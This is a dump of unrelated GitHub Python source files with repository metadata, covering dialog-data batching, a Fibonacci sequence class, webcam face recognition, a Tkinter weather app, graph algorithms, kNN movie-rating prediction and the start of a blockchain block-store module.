'_'.join(row['poi'].split())\n # for key,value in row.items():\n # norm_row.append('<'+poi+':'+key+'>')\n norm_row.append('<'+poi+':'+'poi'+'>')\n norm_row.append('<'+poi+':'+'poi_type'+'>')\n norm_kb.append(norm_row)\n return norm_kb\n\n\ndef generate_instances(keys, train_dialogs, triples, value_to_abstract_keys):\n '''\n 生成形如[(u1 s1 u2, s2),...]的数据\n :param keys:\n :param train_dialogs:\n :param triples:\n :param value_to_abstract_keys:\n :return:\n '''\n instances = []\n for dialog in train_dialogs:\n if dialog is not None:\n #if (1):\n #if (dialog['scenario']['task']['intent'] == 'navigate'):\n flag = True\n for dialogue in dialog['dialogue']:\n if (dialogue['turn'] == 'assistant'):\n output_sentence = noralize_value(normalize_key(dialogue['data']['utterance'], keys), value_to_abstract_keys)\n instances.append((input_sentence, output_sentence))\n input_sentence += ' '\n elif (dialogue['turn'] == 'driver'):\n if flag:\n input_sentence = ''\n flag = False\n pass\n else:\n input_sentence += ' '\n input_sentence += normalize_key(dialogue['data']['utterance'], keys)\n\n return instances\n\n\ndef sentence_to_idx(lang, instances):\n '''\n\n :param lang:\n :param train_instances: [(),()]\n :return: [(([],[]),[[],[],..]),()]\n '''\n idx_instances = []\n for (instance, kb) in instances:\n instance_0 = [lang.word2idx['']]+ lang.sentence_to_idx(instance[0])\n instance_1 = [lang.word2idx['']]+ lang.sentence_to_idx(instance[1]) + [lang.word2idx['']]\n kb_ = copy.deepcopy(kb)\n if kb_ is not None:\n for item in kb_:\n for idx,key in enumerate(item):\n item[idx] = lang.word2idx.get(key, 1)\n idx_instances.append(((instance_0, instance_1),kb_))\n return idx_instances\n\n\ndef generate_batch(instances, batch_gold, batch_size, pad_idx):\n '''\n\n :param instances: [(([],[]),[[],[],..]),()]\n :param batch_gold:\n :param pad_idx:\n :return: [[],] (batch_size, max_length)\n '''\n batch_input = []\n batch_output = []\n batch_kb = []\n for ((input, output), kb) in instances:\n batch_input.append(input)\n batch_output.append(output)\n batch_kb.append(kb)\n\n batch_gold_output = []\n\n for (_, gold_output) in batch_gold:\n batch_gold_output.append(gold_output)\n\n lst = range(batch_size)\n lst = sorted(lst, key = lambda d: -len(batch_input[d]))\n batch_input = [batch_input[ids] for ids in lst]\n batch_output = [batch_output[ids] for ids in lst] # 这里是统一按照lst进行排序,我们后面是按照output的原始顺序来做\n batch_gold_output = [batch_gold_output[ids] for ids in lst]\n batch_kb = [batch_kb[ids] for ids in lst] # [[[],..],..]\n\n batch_poi = []\n batch_type = []\n max_poi, max_type = 0, 0\n for idx,item in enumerate(batch_kb): # 行要满8\n if item is not None:\n # for key in item:\n # max_poi = max(len(key['poi']), max_poi)\n # max_type = max(len(key['poi_type']), max_type)\n if len(item) < 8:\n batch_kb[idx].append([1,1]) # fixme 这里用0还是1\n else:\n raise (IOError)\n # batch_poi = [[key['poi'] + [0] * (max_poi - len(key['poi'])) for key in item] \\\n # for item in batch_kb]\n # batch_type = [[key['poi_type'] + [0] * (max_type - len(key['poi_type'])) for key in item] \\\n # for item in batch_kb]\n\n input_max_length = len(batch_input[0])\n output_max_length = max([len(batch_output[i]) for i in range(batch_size)])\n sentence_lens = [len(batch_input[i]) for i in range(batch_size)]\n\n batch_input = [batch_input[i] + [pad_idx] * (input_max_length - len(batch_input[i])) for i in range(batch_size)]\n batch_output = [batch_output[i] + [pad_idx] * (output_max_length - len(batch_output[i])) for i in range(batch_size)]\n\n batch_input = Variable(torch.LongTensor(batch_input)).cuda() if use_cuda else Variable(torch.LongTensor(batch_input))\n batch_output = Variable(torch.LongTensor(batch_output)).cuda() if use_cuda else Variable(torch.LongTensor(batch_output))\n\n # batch_poi = Variable(torch.LongTensor(batch_poi)).cuda() if use_cuda else Variable(torch.LongTensor(batch_poi))\n # batch_type = Variable(torch.LongTensor(batch_type)).cuda() if use_cuda else Variable(torch.LongTensor(batch_type))\n batch_kb = Variable(torch.LongTensor(batch_kb)).cuda() if use_cuda else Variable(torch.LongTensor(batch_kb))\n\n return batch_input, batch_output, batch_gold_output, batch_kb, batch_poi, batch_type, sentence_lens\n\n\ndef flatten(lst):\n return list(itertools.chain.from_iterable(lst))\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"uniphix000/HQ_KeyValue","sub_path":"new_data_src_attn/src/datautils.py","file_name":"datautils.py","file_ext":"py","file_size_in_byte":16397,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25581567238","text":"#immutable type sequence\nfrom functools import lru_cache\n\nclass Fib:\n\n def __init__(self, n):\n self.n = n\n \n def __len__(self):\n return self.n\n \n def __getitem__(self, s):\n if isinstance(s, int):\n if s < 0:\n s = self.n + s\n if s < 0 or s >= self.n:\n raise IndexError\n return Fib._fib(s)\n else:\n rng = range(*s.indices(self.n))\n return [Fib._fib(i) for i in rng]\n \n @staticmethod\n @lru_cache(2**10)\n def _fib(n):\n if n < 2:\n return 1\n return Fib._fib(n-1) + Fib._fib(n-2)\n \nfib = Fib(10)\nprint(fib[0:4])\nprint(fib[-1:-4:-1])\nprint(list(fib))\n\nl1 = [1,2,3]\nl1 += range(7, 10)\nprint(l1)\n","repo_name":"rkoch7/Learning-Python","sub_path":"custom_sequence.py","file_name":"custom_sequence.py","file_ext":"py","file_size_in_byte":752,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"70165919461","text":"import face_recognition, cv2\r\nimport numpy as np\r\n\r\nprint(\"loading files...\")\r\npathToFile = \"\" \"\"#enter the path to the image file here\r\n\r\n# you can repeat the next 2 lines for as many faces as you would want to test for.\r\nmyImage = face_recognition.load_image_file(pathToFile)#loads the image to be processed\r\nmyImageEncoding = face_recognition.face_encodings(myImage)[0]#returns the encoding of the face of the individual in the image\r\nknown_face_encodings= [myImageEncoding]\r\nknown_face_names = [\"Evans\"]\r\n\r\nprint(\"file loading complete.\")\r\n\r\n# You can do it like this\r\n# name = \"\" # must be defined\r\n# known_face_data = {\r\n# name: myImageEncoding\r\n# }\r\n\r\nprint(\"starting cv2...\")\r\nliveVideo = cv2.VideoCapture(0) #takes video from webCam\r\n\r\n#starting in an infinite loop to be able to continue until a condition is met.\r\nface_encodings = []\r\nface_locations = [] #declaring it here to keep the variables global so that we can do whatever we want to do with it later.\r\nfont = cv2.FONT_HERSHEY_DUPLEX\r\nwhile True:\r\n print(\"in the loop\")\r\n # cv2.VideoCapture().read() returns a tuple (x,y)\r\n # x is a boolean to determine whether there is a frame \r\n # y is the frame\r\n # NB: a video is just a series of images being played \"very fast\"... so we will process it frame by frame\r\n isCompleted, frameBGR = liveVideo.read() #returns a tuple\r\n frameRGB = cv2.cvtColor(frameBGR, cv2.COLOR_BGR2RGB) #cv2 captures frames in BGR but face_recognition works in RGB... therefore the need to convert from BGR to RGB\r\n\r\n face_locations = face_recognition.face_locations(frameRGB) #get all the faces in the image\r\n face_encodings = face_recognition.face_encodings(frameRGB, face_locations) #get all the face encodings in the image\r\n\r\n for (point1, point2, point3, point4), face_encoding in zip(face_locations, face_encodings):\r\n # NB:\r\n # point1-------point2\r\n # | |\r\n # | |\r\n # point4-------point3\r\n # going through all the known faces and face_encodings to determine if there are matches\r\n \r\n name = \"Unknown\" # default name before a test is conducted\r\n\r\n print(\"face(s) detected..\")\r\n matches = face_recognition.compare_faces(known_face_encodings, face_encoding) #checking if there is a matching face... returns a list of bools\r\n print(matches)\r\n print('****************q')\r\n\r\n # Testing can be done in 2 ways\r\n \r\n #First\r\n # if True in matches: #if a match has been detected\r\n # name = known_face_names[matches.index(True)] # name is gotten using the index of the element that is True\r\n\r\n #Second\r\n #found this on the internet\r\n face_distances = face_recognition.face_distance(known_face_encodings, face_encoding) # determines how closely related the faces are... returns a numpy array\r\n print(face_distances)\r\n print('****************q')\r\n best_match_index = np.argmin(face_distances) # this returns the index of the minimum value... minimum value would be the one with the least error between the various face_encodings\r\n if matches[best_match_index]:\r\n name = known_face_names[best_match_index]\r\n\r\n cv2.rectangle(frameBGR, (point4, point1), (point2, point3), (0, 255, 0), 2) # draw a bounding box around face\r\n # cv2.rectangle(frameToDrawOn, startingPoint, endPoint, color, widthOfLine) describes the function above\r\n cv2.putText(frameBGR, name,(point4, point1 - 40), font, 1, (0, 0, 255), 1, cv2.LINE_AA) # write text on the image\r\n\r\n cv2.imshow('LiveVideo', frameBGR) # shows the frame\r\n if cv2.waitKey(10) & 0xFF == ord('q'):\r\n # this checks to see if the letter 'q' is pressed... if so, it will break.\r\n # here is a link if you would like more info: https://stackoverflow.com/questions/57690899/how-cv2-waitkey1-0xff-ordq-works\r\n break\r\nliveVideo.release() #release the hardware and software resources in use by the cv2.VideoCapture() function. \r\n# if not done... the camera will not be able to function upon another cv2.VideoCapture() call\r\ncv2.destroyAllWindows() # destroy all the windows up atm..","repo_name":"AWESOME04/Facial-Recognition-Using-Python-OpenCV","sub_path":"FaceRecon.py","file_name":"FaceRecon.py","file_ext":"py","file_size_in_byte":4207,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"15604811732","text":"from tkinter import *\nfrom tkinter import messagebox\nfrom PIL import Image, ImageTk\nimport requests\n#-----------------------------------------------------\nurl=\"http://api.openweathermap.org/data/2.5/weather?q={}&appid={}\"\napi_key=\"2b980defab2037105b2465caee9b70c1\"\n\nwin=Tk()\n\nwin.title(\"KWeather\")\n\nwin.geometry(\"450x325+100+50\")\nwin.resizable(width=False,height=False)\n\nicon=PhotoImage(file=\"Weather.png\")\nwin.call(\"wm\",\"iconphoto\",win._w,icon)\n#--------------------------------------------------------\ndef gwthr(city):\n urwpi=requests.get(url.format(city,api_key))\n if urwpi:\n jsonData=urwpi.json()\n city=jsonData[\"name\"]\n contry=jsonData[\"sys\"][\"country\"]\n tempk=jsonData[\"main\"][\"temp\"]\n tempc=tempk-273.15\n tempf=(tempk-273.15)*9/5+32\n wthr=jsonData[\"weather\"][0][\"main\"]\n pres=jsonData[\"main\"][\"pressure\"]\n des=jsonData[\"weather\"][0][\"description\"]\n fire=(city,contry,tempc,tempf,wthr,pres,des)\n return fire\n else:\n return None\ndef serch():\n city=citytx.get()\n wthrdt=gwthr(city)\n if wthrdt:\n lbloc[\"text\"]=(f\"location:{wthrdt[0]},{wthrdt[1]}\")\n lbltemp[\"text\"]=(\"Temperature:{:.2f}°C,{:.2f}°F\".format(wthrdt[2],wthrdt[3]))\n lblwth[\"text\"]=(f\"weather:{wthrdt[4]}\")\n lblprs[\"text\"]= (f\"Pressure:{wthrdt[5]}\")\n else:\n messagebox.showerror(\"Error\",f\"can not find city {city}\")\n\n\n\n#----------------------------------------------------\ncan0=Canvas(win,width=450,height=300,bg=\"#B6B6B4\",relief=\"raise\")\ncan0.pack()\n\ncan1=Canvas(win,width=445,height=250,bg=\"#D1D0CE\")\ncan0.create_window(224,180,window=can1)\n\ncan2=Canvas(win,width=445,height=50,bg=\"#B6B6B4\")\ncan0.create_window(224,300,window=can2)\n#--------------------------------------------------------\nphoto=Image.open(\"WH.png\")\nphoto=photo.resize((45,45))\nimg1=ImageTk.PhotoImage(photo)\nlblimg=Label(win,width=42,height=42,image=img1,bg=\"#B6B6B4\")\ncan0.create_window(25,25,window=lblimg)\n\ncitytx=StringVar()\n\ncityen=Entry(win,text=\"Location\",fg=\"black\",width=20,bg=\"#D1D0CE\",bd=0,font=(\"times\",14),textvariable=citytx)\ncan0.create_window(270,25,window=cityen)\n\nmytit=Label(win,text=\"KWeather\",font=(\"times\",14,\"bold\"),bg=\"#B6B6B4\")\ncan0.create_window(100,20,window=mytit)\n\nserbtn=Button(win,command=serch,text=\"Refesh\",padx=4,pady=2,relief=FLAT,cursor=\"hand2\",activebackground=\"#c1bebe\",font=(\"helvetica\",10,\"bold\"),bg=\"#D1D0CE\",fg=\"black\")\ncan0.create_window(410,25,window=serbtn)\n#------------------------------------------------------\nlbloc=Label(win,text=\"\",bg=\"#D1D0CE\")\nlbloc.config(font=(\"times\",16,\"bold\"))\ncan1.create_window(210,30,window=lbloc)\n\nlbltemp=Label(win,text=\"\",bg=\"#D1D0CE\")\nlbltemp.config(font=(\"times\",16,\"bold\"))\ncan1.create_window(210,80,window=lbltemp)\n\nlblwth=Label(win,text=\"\",bg=\"#D1D0CE\")\nlblwth.config(font=(\"times\",16,\"bold\"))\ncan1.create_window(210,140,window=lblwth)\n\nlblprs=Label(win,text=\"\",bg=\"#D1D0CE\")\nlblprs.config(font=(\"times\",16,\"bold\"))\ncan1.create_window(210,200,window=lblprs)\n#-----------------------------------------------\nmytit=Label(win,text=\"Development In Python By Khaled Ezzeddin\",font=(\"times\",10),bg=\"#B6B6B4\")\ncan2.create_window(225,25,window=mytit)\n#---------------------------------------------\nwin.mainloop()\n","repo_name":"KhaledEzzeddin/KHM-Weather","sub_path":"KWeather.py","file_name":"KWeather.py","file_ext":"py","file_size_in_byte":3267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27053957455","text":"from collections import deque\nfrom sys import maxsize\n\n\nclass Graph:\n\tdef __init__(self, vertices:int):\n\t\tself.edges = []\n\t\tself.vertices = vertices\n\n\t\tfor i in range(vertices):\n\t\t\tsub_edges = []\n\t\t\tfor j in range(vertices):\n\t\t\t\tsub_edges.append(0)\n\t\t\tself.edges.append(sub_edges)\n\n\tdef addEdge(self, v1:int, v2:int, weight=1, isBothway=True):\n\t\tself.edges[v1][v2] = weight\n\t\tif isBothway:\n\t\t\tself.edges[v2][v1] = weight\n\n\tdef outDegree(self, v1:int):\n\t\tdegree = 0\n\t\tfor i in range(self.vertices):\n\t\t\tif self.edges[v1][i] > 0:\n\t\t\t\tdegree += 1\n\t\treturn degree\n\n\tdef inDegree(self, v1:int):\n\t\tdegree = 0\n\t\tfor i in range(self.vertices):\n\t\t\tif self.edges[i][v1] > 0:\n\t\t\t\tdegree += 1\n\t\treturn degree\n\n\tdef inCost(self, v1:int):\n\t\ttotal_cost = 0\n\t\tfor i in range(self.vertices):\n\t\t\tif self.edges[v1][i] > 0:\n\t\t\t\ttotal_cost += self.edges[v1][i]\n\t\treturn total_cost\n\n\tdef outCost(self, v1:int):\n\t\ttotal_cost = 0\n\t\tfor i in range(self.vertices):\n\t\t\tif self.edges[i][v1] > 0:\n\t\t\t\ttotal_cost += self.edges[i][v1]\n\t\treturn total_cost\n\n\tdef topSortUtil(self, v:int, visited:list, stack:deque):\n\t\tvisited[v] = True\n\n\t\tfor i in range(len(self.edges[v])):\n\t\t\t# To get the edge has never visited and vertice exists\n\t\t\tif visited[i] is False and self.edges[v][i] > 0:\n\t\t\t\tvisited, stack = self.topSortUtil(i, visited, stack)\n\n\t\t# If there is no next vertice exist, push this node to stack\n\t\tstack.append(v)\n\t\treturn visited, stack\n\n\n\tdef topologicalSort(self):\n\t\tindegree = []\n\t\t# To add the indegree for every edge\n\t\tfor i in range(self.vertices):\n\t\t\tindegree.append(self.inDegree(i))\n\n\t\t# Declare stack for ordering and a list of visited to keep track\n\t\tstack = deque()\n\t\tvisited = []\n\t\tfor i in range(self.vertices):\n\t\t\tvisited.append(False)\n\n\t\tfor i in range(self.vertices):\n\t\t\tif visited[i] is False:\n\t\t\t\tvisited, stack = self.topSortUtil(i, visited, stack)\n\t\t# Reversing the list is same as popping all elems to a list\n\t\treturn list(stack)[::-1]\n\n\t# Source: https://www.geeksforgeeks.org/dijkstras-shortest-path-algorithm-greedy-algo-7/\n\tdef minDistance(self, dist, sptSet):\n\t\tminDist = maxsize\n\n\t\tfor v in range(self.vertices):\n\t\t\t# Find the vertex if they are not in min distance vertex\n\t\t\tif dist[v] < minDist and sptSet[v] is False:\n\t\t\t\tminDist = dist[v]\n\t\t\t\tmin_index = v\n\n\t\treturn min_index\n\n\tdef dijkstra(self, origin):\n\t\tprint('We called the function')\n\t\t# Put every vertice distance be inf\n\t\tdist = [maxsize for i in range(self.vertices)]\n\t\t# Origin to origin is 0 in distance\n\t\tdist[origin] = 0\n\t\t# Declase a list of visited to keep track\n\t\tsptSet = [False for i in range(self.vertices)]\n\n\t\tfor _ in range(self.vertices):\n\t\t\t# Find the closest vertex\n\t\t\tu = self.minDistance(dist, sptSet)\n\t\t\t# Keep track of the min distance vertex has found\n\t\t\tsptSet[u] = True\n\t\t\tprint(sptSet)\n\t\t\tprint('Now is', _)\n\t\t\tprint('u is', u)\n\n\t\t\t# Update distance of adjacent vertices of picked vertex\n\t\t\t# if the current distance is greater than new distance\n\t\t\tfor v in range(self.vertices):\n\t\t\t\t# Check vertex exists, self.edges[u][v] > 0\n\t\t\t\t# Whether this node is on min distance, if True, pass\n\t\t\t\t# Compare distance, take the lower one\n\t\t\t\tprint(dist[u],'+',self.edges[u][v],'=',dist[u] + self.edges[u][v])\n\t\t\t\tif self.edges[u][v] > 0 and sptSet[v] is False and \\\n\t\t\t\tdist[v] > dist[u] + self.edges[u][v]:\n\t\t\t\t\tdist[v] = dist[u] + self.edges[u][v]\n\t\t\tprint(dist)\n\n\t\tprint(\"Vertex \\tDistance from Source\")\n\t\tfor node in range(self.vertices): \n\t\t\tprint(node, \"\\t\", dist[node])\n","repo_name":"jacquessham/DataStructure","sub_path":"Graphs/Python/Graph.py","file_name":"Graph.py","file_ext":"py","file_size_in_byte":3460,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"71586503780","text":"# %%\nimport re\nimport pandas as pd\nroot_path = \"../\"\ntickers = [\"TSLA\", \"AAPL\", \"AMZN\", \"FB\", \"MSFT\", \"TWTR\", \"AMD\", \"NFLX\", \"NVDA\", \"INTC\"]\nd = {}\n# %%\n\nfor ticker in tickers:\n with open(root_path + f\"10_code/logs/{ticker}_filtering.log\") as f:\n s = f.read()\n\n regex = re.compile(r\"(?<=shape: \\()\\d+(?=, \\d+\\))\")\n results = re.findall(regex, s)\n\n d.update({ticker: pd.Series(results).drop_duplicates().astype('int32')})\n\n# %%\ndf = (\n pd.DataFrame\n .from_dict(d)\n .set_axis(['initial', 'language filter', '#cashtags filter'], axis=0)\n .T\n )\n\n#%%\ndf.applymap(lambda x: f\"{x:,}\").to_csv(root_path + \"30_results/filtering_stats.csv\", sep=';')\n\n#%%\nrel_reduction = df['#cashtags filter'].astype('int32') / df['initial'].astype('int32')\n\nprint(f\"relative reduction: {rel_reduction.mean()*100:.1f}% (SD={rel_reduction.std()*100:.2f}%p)\")","repo_name":"moritzwilksch/SocialMediaBusinessAnalytics","sub_path":"10_code/46_logs_to_table.py","file_name":"46_logs_to_table.py","file_ext":"py","file_size_in_byte":865,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"31072753014","text":"#!/usr/bin/env python3\n\nfrom collections import deque\n\n\ndef getTopologicalOrder(graph):\n \"\"\" Uses DFS to extract topological sort \"\"\"\n topological_order = []\n marked = set()\n stack = [(\"Galactica\", False)]\n while stack:\n planet, expanded = stack.pop()\n if planet in marked:\n continue\n if expanded:\n marked.add(planet)\n topological_order.append(planet)\n else:\n stack.append((planet, True))\n for successor in graph.get(planet, []):\n stack.append((successor, False))\n topological_order.reverse()\n return topological_order\n\n\ndef getNumberOfDifferentPaths(graph):\n \"\"\" Uses Dynamic Programming to find number of different paths to each\n node \"\"\"\n topological_order = getTopologicalOrder(graph)\n number_of_different_paths = {planet: 0 for planet in topological_order}\n number_of_different_paths[\"Galactica\"] = 1\n for planet in topological_order:\n for successor in graph.get(planet, []):\n number_of_different_paths[successor] += number_of_different_paths[planet]\n return number_of_different_paths[\"New Earth\"]\n\n\ndef main():\n C = int(input())\n for i in range(1,C+1):\n P = int(input())\n graph = {}\n for _ in range(P):\n origin, tail = input().split(\":\")\n for destination in tail.split(\",\"):\n try:\n graph[origin].append(destination)\n except KeyError:\n graph[origin] = [destination]\n print(\"Case #{}: {}\".format(i, getNumberOfDifferentPaths(graph)))\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"sprkrd/tuentichallenge9","sub_path":"p02/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"731296017","text":"#Load Packages\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import pairwise_distances\n\n#Load user, movie and train files as dataframes\nmovie_df = pd.read_csv('movie.txt', sep='\\t' )\nuser_df = pd.read_csv('user.txt', sep='\\t' )\ntrain_df = pd.read_csv('train.txt', sep='\\t' )\n\n#We modify the movie dataframe to contain columns for each genre so that each genre is a feature by itself and we delete the original Genre column\nmovie_df['Genre']=movie_df['Genre'].astype(str) #Convert the Genre column into string type\n\ngenre=[] #Create an empty list to store lists containing genre names for different movis\nfor index, row in movie_df.iterrows(): #Loop over all the rows in the movie dataframe\n genre.append(row['Genre'].strip().split('|')) #Remove blank spaces from the values in Genre and split it at | to form lists and append it to the genre list\ntemp=[] #Create and an empty list temp to store all genre names\nfor i in genre: #Loop over the lists stores in genre\n for j in i: #Loop over the values in these lists\n temp.append(j.strip()) #Remove blank spaces if any and append it to temp\ngenre=temp[:] #Store all values of temp in genre\ndel temp #Delete temp as it is no longer required\ngenre=sorted(set(genre)) #Use set() to store only unique genre names\ngenre.remove('nan') #Remove nan values\n\nfor i in genre: #Loop over all genre names stored in the list genre\n movie_df[i]=0 #Create a column for each of these genres in the movie dataframe and intialize to zero\n\nfor index, row in movie_df.iterrows(): #Loop over each row of movie dataframe\n genre_name=[] #Create an empty list genre_name to store genres for each movie\n genre_name.append(row['Genre'].strip().split('|')) #Remove blank spaces from the values in Genre and split it at | to form lists and append it to the genre_name list\n for i in genre_name[0]: #Loop over the genres in genre_name\n if i.strip() != 'nan': #If the name is not equal to nan\n movie_df.set_value(index,i.strip(),1) #Set the value for the corresponding genre column in movie dataframe to 1\n\ndel movie_df['Genre'] #Delete the Genre column from movie dataframe\n\n#Updating the user dataframe\nuser_df.replace('M', 1, inplace=True) #Changing M to 1 in Gender column of user dataframe\nuser_df.replace('F', 2, inplace=True) #Changing F to 2 in Gender column of user dataframe\n\n#Changing column names in user and movie dataframe to better suit the merging with the tran dataframe\nnames = user_df.columns.tolist() #Add column names from user dataframe to a list called names\nnames[names.index('ID')] = 'user-Id' #Change the value at the index of value 'ID' to 'user-Id'\nuser_df.columns = names #Update the column names in user_df to the updates names in the names list\n\nnames = movie_df.columns.tolist() #Add column names from movie dataframe to a list called names\nnames[names.index('Id')] = 'movie-Id' #Change the value at the index of value 'Id' to 'user-Id'\nmovie_df.columns = names #Update the column names in movie_df to the updates names in the names list\n\n#Merging user and train dataframe on 'user-Id' to form new dataframe called temp_df\ntemp_df=(pd.merge(user_df,train_df , on ='user-Id' ))\n\n#Merging temp_df and movie_df on 'movie-Id' to form new dataframe called final_train_df\nfinal_train_df = pd.merge(temp_df, movie_df, on ='movie-Id')\n\n#Update final_train_df\ndel final_train_df['movie-Id'] #Delete movie-Id column from final_train_df\ndel final_train_df['user-Id'] #Delete user-Id from final_train_df\nfinal_train_df.sort_values(by='Id', inplace=True) #Sort the final_train_df dataframe by Id\nfinal_train_df.set_index('Id',inplace=True) #Make Id as the index of final_train_df dataframe\n\n#Normalizing the columns\ncols_to_norm = ['Gender', 'Age', 'Occupation', 'Year'] #Make a list of the columns to normalize\nfinal_train_df[cols_to_norm] = final_train_df[cols_to_norm].apply(lambda x: (x - x.min()) / (x.max() - x.min()) + 0.5) \n#The upper line normalizes the columns given in list cols_to_norm using a lambda function such that the range of the normalized values is from 0.5 to 1.5\n\nfinal_train_df.replace('NaN', 0, inplace=True) #Replace NaN values by 0 in final_train_df\n\n#Make rating the last column in final_train_df\ncolumns = list(final_train_df.columns.values) #List of all the columns in final_train_df\ncolumns.pop(columns.index('rating')) #Remove rating from the columns list\nfinal_train_df = final_train_df[columns+['rating']] #Create new dataframe with columns in the order you want\n\n#Load the test dataframe\ntest_df = pd.read_csv('test.txt', sep='\\t')\n\ndel temp_df #Delete the temp_df dataframe\ntemp_df=(pd.merge(user_df,test_df , on ='user-Id' )) #Merge the user dataframe and test dataframe on 'user-Id' and create new dataframe called temp_df\nfinal_test_df = pd.merge(temp_df, movie_df, on ='movie-Id') #Merge temp_df and movie_df on 'movie-Id' and store in final_test_df\n\nfinal_test_df.sort_values(by='Id', inplace=True) #Sort final_test_df by Id\ndel final_test_df['movie-Id'] #Delete movie-Id column from final_test_df\ndel final_test_df['user-Id'] #Delete user-Id column from final_test_df\nfinal_test_df.set_index('Id',inplace=True) #Make Id as the index of final_test_df\n\ndel test_df #Delete test_df\ndel temp_df #Delete temp_df\ndel user_df #Delete user_df\ndel movie_df #Delete movie_df\ndel train_df #Delete train_df\n\nfinal_test_df['rating']=0 #Create column rating in final_test_df and initialize it to zero\n\n\n#Normalize the columns\ncols_to_norm = ['Gender', 'Age', 'Occupation', 'Year'] #Make a list of the columns to normalize\nfinal_test_df[cols_to_norm] = final_test_df[cols_to_norm].apply(lambda x: (x - x.min()) / (x.max() - x.min())+ 0.5)\n#The upper line normalizes the columns given in list cols_to_norm using a lambda function such that the range of the normalized values is from 0.5 to 1.5\n\nfinal_test_df.replace('NaN', 0, inplace=True) #Replace NaN in final_test_df by zero\n\n#Creating arrays for final_train_df and final_test_df\ntrain_data = final_train_df.values\ntest_data = final_test_df.values\n\n#Finding 15 nearest neighbors and using majority vote to obtain ratings in final_test_df\ntest_cols , m = final_test_df.shape #Store number of rows in test_cols\nfor i in range(test_cols):\n cos_dist=pairwise_distances(train_data[:,:-1],test_data[i,:-1].reshape(1,-1), metric=\"cosine\") \n #The previous line finds the cosine distance of a row in the final_test_df with all the rows in the final_train_df\n closest_neighbors = cos_dist[:,0].argsort()[:15] \n #The previous line gets the indices of the 15 closest neighbors and stores them in closest_neighbors\n final_test_df.iloc[i, final_test_df.columns.get_loc('rating')] = final_train_df.iloc[closest_neighbors]['rating'].value_counts().idxmax() \n #The previous line gets the ratings of all the closest neighbors, then counts (.value_counts()) the number of times each value occurs\n #and then gives the value corresponding to maximum count (.idmax()) and stores it in k\n\nfinal_test_df.reset_index(level=0, inplace=True) #Resetting the Id as the index in the final_test_df\n\n#Deleting all unnecessary columns from final_test_df\ndel final_test_df['Gender']\ndel final_test_df['Age']\ndel final_test_df['Occupation']\ndel final_test_df['Year']\ndel final_test_df['Action']\ndel final_test_df['Adventure']\ndel final_test_df['Animation']\ndel final_test_df[\"Children's\"]\ndel final_test_df['Comedy']\ndel final_test_df['Crime']\ndel final_test_df['Documentary']\ndel final_test_df['Drama']\ndel final_test_df['Fantasy']\ndel final_test_df['Film-Noir']\ndel final_test_df['Horror']\ndel final_test_df['Musical']\ndel final_test_df['Mystery']\ndel final_test_df['Romance']\ndel final_test_df['Sci-Fi']\ndel final_test_df['Thriller']\ndel final_test_df['War']\ndel final_test_df['Western']\n\n#Saving the final_test_df as a .txt file\nfinal_test_df.to_csv('Final_kNN15_Sol.txt', index=False)","repo_name":"harshadrai/Data-Mining","sub_path":"Project_Movie_Rating/kNN.py","file_name":"kNN.py","file_ext":"py","file_size_in_byte":9385,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"35"} +{"seq_id":"19599865232","text":"from __future__ import annotations\n\nimport dataclasses\nimport logging\nimport sqlite3\nfrom typing import Dict, List, Optional, Tuple, Any, Union, Sequence\n\nimport typing_extensions\nimport zstd\n\nfrom flax.consensus.block_record import BlockRecord\nfrom flax.types.blockchain_format.program import SerializedProgram\nfrom flax.types.blockchain_format.sized_bytes import bytes32\nfrom flax.types.full_block import FullBlock\nfrom flax.types.weight_proof import SubEpochChallengeSegment, SubEpochSegments\nfrom flax.util.db_wrapper import DBWrapper2, execute_fetchone\nfrom flax.util.errors import Err\nfrom flax.util.full_block_utils import block_info_from_block, generator_from_block\nfrom flax.util.ints import uint32\nfrom flax.util.lru_cache import LRUCache\nfrom flax.util.full_block_utils import GeneratorBlockInfo\n\nlog = logging.getLogger(__name__)\n\n\n@typing_extensions.final\n@dataclasses.dataclass\nclass BlockStore:\n block_cache: LRUCache[bytes32, FullBlock]\n db_wrapper: DBWrapper2\n ses_challenge_cache: LRUCache[bytes32, List[SubEpochChallengeSegment]]\n\n @classmethod\n async def create(cls, db_wrapper: DBWrapper2) -> BlockStore:\n self = cls(LRUCache(1000), db_wrapper, LRUCache(50))\n\n async with self.db_wrapper.writer_maybe_transaction() as conn:\n\n log.info(\"DB: Creating block store tables and indexes.\")\n if self.db_wrapper.db_version == 2:\n\n # TODO: most data in block is duplicated in block_record. The only\n # reason for this is that our parsing of a FullBlock is so slow,\n # it's faster to store duplicate data to parse less when we just\n # need the BlockRecord. Once we fix the parsing (and data structure)\n # of FullBlock, this can use less space\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS full_blocks(\"\n \"header_hash blob PRIMARY KEY,\"\n \"prev_hash blob,\"\n \"height bigint,\"\n \"sub_epoch_summary blob,\"\n \"is_fully_compactified tinyint,\"\n \"in_main_chain tinyint,\"\n \"block blob,\"\n \"block_record blob)\"\n )\n\n # This is a single-row table containing the hash of the current\n # peak. The \"key\" field is there to make update statements simple\n await conn.execute(\"CREATE TABLE IF NOT EXISTS current_peak(key int PRIMARY KEY, hash blob)\")\n\n # If any of these indices are altered, they should also be altered\n # in the flax/cmds/db_upgrade.py file\n log.info(\"DB: Creating index height\")\n await conn.execute(\"CREATE INDEX IF NOT EXISTS height on full_blocks(height)\")\n\n # Sub epoch segments for weight proofs\n await conn.execute(\n \"CREATE TABLE IF NOT EXISTS sub_epoch_segments_v3(\"\n \"ses_block_hash blob PRIMARY KEY,\"\n \"challenge_segments blob)\"\n )\n\n # If any of these indices are 